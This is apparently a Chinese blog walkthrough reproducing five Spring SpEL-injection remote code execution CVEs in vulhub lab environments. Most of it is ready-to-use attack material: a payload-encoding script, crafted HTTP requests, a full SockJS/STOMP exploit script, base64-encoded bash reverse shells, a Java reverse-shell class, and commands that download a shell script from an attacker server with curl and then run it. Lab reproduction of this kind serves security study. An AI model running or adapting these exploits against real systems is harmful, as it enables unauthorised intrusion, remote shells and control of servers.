基础知识

  Spring框架是由于软件开发的复杂性而创建的。Spring使用的是基本的JavaBean来完成以前只可能由EJB完成的事情。然而，Spring的用途不仅仅限于服务器端的开发。从简单性、可测试性和松耦合性角度而言，绝大部分Java应用都可以从Spring中受益。

漏洞原理

  CVE-2016-4977：Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language (SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。

  CVE-2017-4971：Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。

  CVE-2017-8046：Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中【实现RFC6902】(https://tools.ietf.org/html/rfc6902)），path的值被传入setValue，导致执行了SpEL表达式，触发远程命令执行漏洞。

  CVE-2018-1270：spring messaging是基于sockjs（可以理解为一个通信协议），而sockjs适配多种浏览器：现代浏览器中使用websocket通信，老式浏览器中使用ajax通信。
连接后端服务器的流程，可以理解为： 用STOMP协议将数据组合成一个文本流，再用sockjs协议发送文本流，sockjs会选择一个合适的通道：websocket或xhr(http)，与后端通信，使用http来复现漏洞，称之为“降维打击”。

  CVE-2018-1273：Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。

涉及版本

  CVE-2016-4977：

• Spring Security OAuth 2.3到2.3.2
• Spring Security OAuth 2.2到2.2.1
• Spring Security OAuth 2.1到2.1.1
• Spring Security OAuth 2.0到2.0.14

  CVE-2017-4971：

• Spring WebFlow 2.4.0 - 2.4.4
• 较旧的不受支持的版本也会受到影响

  CVE-2017-8046：

• Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
• Spring Boot version < 2.0.0M4
• Spring Data release trains < Kay-RC3

  CVE-2018-1270：

• Spring Framework 5.0 to 5.0.4.
• Spring Framework 4.3 to 4.3.14
• 已不支持的旧版本仍然受影响

  CVE-2018-1273：

• Spring Data Commons 1.13至1.13.10（Ingalls SR10）
• Spring Data REST 2.6至2.6.10（Ingalls SR10）
• Spring Data Commons 2.0至2.0.5（Kay SR5）
• Spring Data REST 3.0至3.0.5（Kay SR5）
• 较旧的不受支持的版本也会受到影响

漏洞复现

CVE-2016-4977

启动环境：

http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

首先需要填写用户名和密码，我们这里填入admin:admin，发现返回结果为${}中的乘法被执行：

（1）创建文件

使用靶场自带的脚本：

// poc.py
#!/usr/bin/env pythonmessage = input('Enter message to encode:')poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])for ch in message[1:]:poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) poc += ')}'

执行脚本，命令如下：

// 命令
python poc.py 
Enter message to encode:touch /tmp/111

执行的记录如下：

poc如下：

// An highlighted block
/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(116).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)))}&client_id=acme&scope=openid&redirect_uri=http://test

得到poc拼接到上面的${}位置，即可执行，burp suite记录如下：

成功执行：

（1）反弹

编码反弹语句（不编码的试了没有反弹成功）：

bash -i >& /dev/tcp/目标 IP/2222 0>&1
// 编码后
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC42Ny4xMjUvMjIyMiAwPiYx}|{base64,-d}|{bash,-i}

在线编码工具：

http://www.jackson-t.ca/runtime-exec-payloads.html

将编码后的反弹命令再编码一下，得到攻击的poc

执行命令：

// GET包访问路径
/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(121)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(85)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(121)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(80)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

成功反弹~

CVE-2017-4971

（1）反弹

境启动后，访问http://your-ip:8080，将看到一个酒店预订的页面，这是spring-webflow官方给的简单示例，首先访问http://your-ip:8080/login:

用页面左边给出的任意一个账号/密码登录系统：然后访问id为1的酒店http://your-ip:8080/hotels/1，点击预订按钮“Book Hotel”，填写相关信息后点击“Process”


此时抓包，抓到一个POST数据包，我们向其中添加一个字段

// 注意反弹的端口和IP修改，反弹语句需要url编码
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub

监听端口：

成功反弹~

CVE-2017-8046

（1）创建文件夹

// 拼接访问
/customers/1

抓包：

修改数据包（注意Content-Type: application/json-patch+json等，最好直接拿下面的包修改ip）：

注意

// 待发送的数据包
PATCH /customers/1 HTTP/1.1
Host: 目标IP:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

成功创建文件夹

（2）反弹：
想要执行反弹命令，首先要对命令进行两次转换，第一次编码，第二次转换为对应的ASCII码值：

// 反弹命令
bash -i >& /dev/tcp/目标IP/2222 0>&1

在线编码地址

http://www.jackson-t.ca/runtime-exec-payloads.html

转换为ASCII码值的小工具ASCII.py：

// An highlighted block
# -*- coding: UTF-8 -*-
a=str(input('a.字符串转换成ASCII码\nb.ASCII码转换成字符串\n请输入你需要的模式：'))
def zhuana(x):b=list(x)for i in range(len(x)):print(ord(b[i]),end='')print(' ',end='')
def zhuanb(x):for i in range(len(x)):z=chr(int(x[i]))print(z,end='')
if a=='a' :x = str(input('请输入：'))zhuana(x)
else :y = input('请输入：')x=y.split()zhuanb(x)

使用方法（使用python3）：

生成的ASCII码中的空格要替换成英文的逗号，可以放在文本编辑器中ctrl+h全部替换：

替换上述payload中的内容：

// 注意修改命令和IP
PATCH /customers/1 HTTP/1.1
Host: 目标IP:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 450[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,52,77,83,52,50,79,67,52,50,78,121,52,120,77,106,85,118,77,106,73,121,77,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]

成功反弹~

CVE-2018-1270

启动靶场访问环境：

（1）创建文件夹：

使用如下脚本直接进行命令执行，注意需要修改目标IP（需要使用python>=3.6）:

// 创建文件夹名字test
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import jsonlogging.basicConfig(stream=sys.stdout, level=logging.INFO)def random_str(length):letters = string.ascii_lowercase + string.digitsreturn ''.join(random.choice(letters) for c in range(length))class SockJS(threading.Thread):def __init__(self, url, *args, **kwargs):super().__init__(*args, **kwargs)self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'self.daemon = Trueself.session = requests.session()self.session.headers = {'Referer': url,'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'}self.t = int(time.time()*1000)def run(self):url = f'{self.base}/htmlfile?c=_jp.vulhub'response = self.session.get(url, stream=True)for line in response.iter_lines():time.sleep(0.5)def send(self, command, headers, body=''):data = [command.upper(), '\n']data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))data.append('\n\n')data.append(body)data.append('\x00')data = json.dumps([''.join(data)])response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)if response.status_code != 204:logging.info(f"send '{command}' data error.")else:logging.info(f"send '{command}' data success.")def __del__(self):self.session.close()sockjs = SockJS('http://目标IP:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)sockjs.send('connect', {'accept-version': '1.1,1.0','heart-beat': '10000,10000'
})
sockjs.send('subscribe', {'selector': "T(java.lang.Runtime).getRuntime().exec('touch test')",'id': 'sub-0','destination': '/topic/greetings'
})data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {'content-length': len(data),'destination': '/app/hello'
}, data)

执行命令，生成文件夹：

（2）反弹

// 反弹命令
bash -i >& /dev/tcp/目标IP/2222 0>&1

在线编码地址

http://www.jackson-t.ca/runtime-exec-payloads.html

// 编码后的反弹命令
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC42Ny4xMjUvMjIyMiAwPiYx}|{base64,-d}|{bash,-i}

// 反弹shell的脚本，CVE-2018-1270.py注意修改IP
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import jsonlogging.basicConfig(stream=sys.stdout, level=logging.INFO)def random_str(length):letters = string.ascii_lowercase + string.digitsreturn ''.join(random.choice(letters) for c in range(length))class SockJS(threading.Thread):def __init__(self, url, *args, **kwargs):super().__init__(*args, **kwargs)self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'self.daemon = Trueself.session = requests.session()self.session.headers = {'Referer': url,'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'}self.t = int(time.time()*1000)def run(self):url = f'{self.base}/htmlfile?c=_jp.vulhub'response = self.session.get(url, stream=True)for line in response.iter_lines():time.sleep(0.5)def send(self, command, headers, body=''):data = [command.upper(), '\n']data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))data.append('\n\n')data.append(body)data.append('\x00')data = json.dumps([''.join(data)])response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)if response.status_code != 204:logging.info(f"send '{command}' data error.")else:logging.info(f"send '{command}' data success.")def __del__(self):self.session.close()sockjs = SockJS('http://目标IP:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)sockjs.send('connect', {'accept-version': '1.1,1.0','heart-beat': '10000,10000'
})
sockjs.send('subscribe', {'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC42Ny4xMjUvMjIyMiAwPiYx}|{base64,-d}|{bash,-i}')",'id': 'sub-0','destination': '/topic/greetings'
})data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {'content-length': len(data),'destination': '/app/hello'
}, data)

CVE-2018-1273

（1）稍等一会，环境启动后，访问http://your-ip:8080/users，将可以看到一个用户注册页面

提交抓包：

修改数据包，创建文件：

// An highlighted block
POST /users?page=&size=5 HTTP/1.1
Host: 目标IP:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://目标IP:8080
Connection: close
Referer: http://目标IP:8080/users
Cookie: JSESSIONID=ps12fFsDY1rHrl1gzRQ1l2yvZ9QlQvCwnHyvCMvw3v572s29yFrF!1613525042
Upgrade-Insecure-Requests: 1username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/test")]=&password=&repeatedPassword=

进入容器查看文件夹是否创建成功：

文件创建成功~

（2）反弹（针对java环境）：

首先上传一个编译后的class文件：

Exploit.java文件如下：
```javascript
// 注意修改目标IP
//javac Exploit.java
public class Exploit{public Exploit(){try{Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/目标IP/2222 0>&1");}catch(Exception e){e.printStackTrace();}}public static void main(String[] argv){Exploit e = new Exploit();}
}

// 反编译一下java文件
javac Exploit.java

将反编译后的文件放在攻击主机的/root目录下（目录可以自定义），然后在此目录下开启一个http服务，用于访问下载文件：

// 端口可以自行修改
python -m http.server 9999

访问当前主机开启的http服务查看是否开启成功，发现该目录下的Exploit.class访问即可下载

修改bp包中的内容，执行访问下载命令：

// An highlighted block
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("http://目标IP：:9999  /Exploit.class")]=&password=&repeatedPassword=

我们可以看到成功下载该文件：

接下来考虑如何执行该文件，由于上一步中我们直接访问下载并未指定下载路径（下面有介绍使用curl wget可以指定下载路径 对应参数-o -P ），因此博主进入容器环境查看了一下下载的文件在/目录下，因此可以直接执行，修改包如下：

// java 直接执行class文件名不加后缀
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("http://目标IP:9999/Exploit.class")]=&password=&repeatedPassword=
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("java Exploit")]=&password=&repeatedPassword=

反弹成功~

（3）反弹（针对bash环境）：

与上面的思路大同小异，只是这里执行的文件为.sh

bash.sh文件内容为：

// 注意修改IP和端口
bash -i >& /dev/tcp/目标IP/2222 0>&1

将bash.sh上传到/root目录下，上述环境中已经提到如何操作，这里就不再赘述了，首先使用curl命令指定路径将bash.sh下载到目标主机/tmp/目录下：

// 下载文件
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl -o /tmp/bash.sh http://目标IP:9999/bash.sh")]=&password=&repeatedPassword=

在监听口可以知道文件已下载，开始执行命令：

// 执行.sh文件
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash /tmp/bash.sh")]=&password=&repeatedPassword=

反弹成功~

参考资料：

https://blog.csdn.net/baidu_38844729/article/details/107149916
https://blog.csdn.net/weixin_43736941/article/details/108276870
https://github.com/Savitar1997/ASCII
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1270
http://xxlegend.com/2017/09/29/Spring%20Data%20Rest%E6%9C%8D%E5%8A%A1%E5%99%A8PATCH%E8%AF%B7%E6%B1%82%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9ECVE-2017-8046%E8%A1%A5%E5%85%85%E5%88%86%E6%9E%90/
https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c